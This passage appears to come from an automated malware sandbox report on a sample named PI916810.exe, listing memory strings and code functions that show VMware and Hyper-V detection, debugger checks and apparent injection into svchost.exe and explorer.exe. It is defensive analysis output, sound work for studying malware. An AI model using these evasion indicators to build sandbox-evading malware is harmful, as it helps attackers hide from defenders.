Source: explorer.exe, 00000003.00000000.2046728721.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000003.00000002.4492745414.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000003.2422468972.000000000354B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000003.2422468972.000000000354B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware,p
Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000003.00000000.2044763297.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.2046728721.000000000769A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\PI916810.exe | API call chain: ExitProcess graph end node | graph_0-97878
Source: C:\Users\user\Desktop\PI916810.exe | API call chain: ExitProcess graph end node | graph_0-97952
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WWAHost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00409AA0 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040ACE0 LdrLoadDll
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004D41FD BlockInput
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00463B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00495CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004DC304 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_010FD540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_010FEB30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_010FEB90 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]
